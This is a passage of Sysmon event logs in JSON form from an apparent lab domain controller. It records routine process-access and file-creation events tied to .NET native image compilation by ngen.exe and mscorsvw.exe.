{"EventTime":"2020-08-01 08:05:04","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6945,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:04.367\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2230-5F25-0000-0010C84A0B00}\r\nTargetProcessId: 2408\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:04.367","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2230-5F25-0000-0010C84A0B00}","TargetProcessId":"2408","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:04","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6946,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:04.367\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2230-5F25-0000-0010C84A0B00}\r\nTargetProcessId: 2408\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:04.367","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2230-5F25-0000-0010C84A0B00}","TargetProcessId":"2408","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:04","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6947,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:05:04.554\r\nProcessGuid: {41C8662E-2230-5F25-0000-0010C84A0B00}\r\nProcessId: 2408\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\968-0\\Microsoft.GroupPolicy.Commands.dll\r\nCreationUtcTime: 2020-08-01 08:05:04.554","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:05:04.554","ProcessGuid":"{41C8662E-2230-5F25-0000-0010C84A0B00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\968-0\\Microsoft.GroupPolicy.Commands.dll","CreationUtcTime":"2020-08-01 08:05:04.554","EventReceivedTime":"2020-08-01 08:05:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:04","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6948,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:04.570\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2230-5F25-0000-00109C4E0B00}\r\nTargetProcessId: 4116\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:04.570","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2230-5F25-0000-00109C4E0B00}","TargetProcessId":"4116","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:04","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6949,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:04.570\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2230-5F25-0000-00109C4E0B00}\r\nTargetProcessId: 4116\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:04.570","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2230-5F25-0000-00109C4E0B00}","TargetProcessId":"4116","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:04","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6950,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:04.585\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2230-5F25-0000-00109C4E0B00}\r\nTargetProcessId: 4116\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:04.585","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2230-5F25-0000-00109C4E0B00}","TargetProcessId":"4116","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:04","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6951,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:05:04.757\r\nProcessGuid: {41C8662E-2230-5F25-0000-00109C4E0B00}\r\nProcessId: 4116\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1014-0\\Microsoft.GroupPolicy.Commands.dll\r\nCreationUtcTime: 2020-08-01 08:05:04.757","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:05:04.757","ProcessGuid":"{41C8662E-2230-5F25-0000-00109C4E0B00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1014-0\\Microsoft.GroupPolicy.Commands.dll","CreationUtcTime":"2020-08-01 08:05:04.757","EventReceivedTime":"2020-08-01 08:05:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:04","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6952,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:04.773\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2230-5F25-0000-001089520B00}\r\nTargetProcessId: 4656\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:04.773","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2230-5F25-0000-001089520B00}","TargetProcessId":"4656","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:04","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6953,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:04.773\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2230-5F25-0000-001089520B00}\r\nTargetProcessId: 4656\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:04.773","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2230-5F25-0000-001089520B00}","TargetProcessId":"4656","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:04","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6954,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:04.773\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2230-5F25-0000-001089520B00}\r\nTargetProcessId: 4656\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 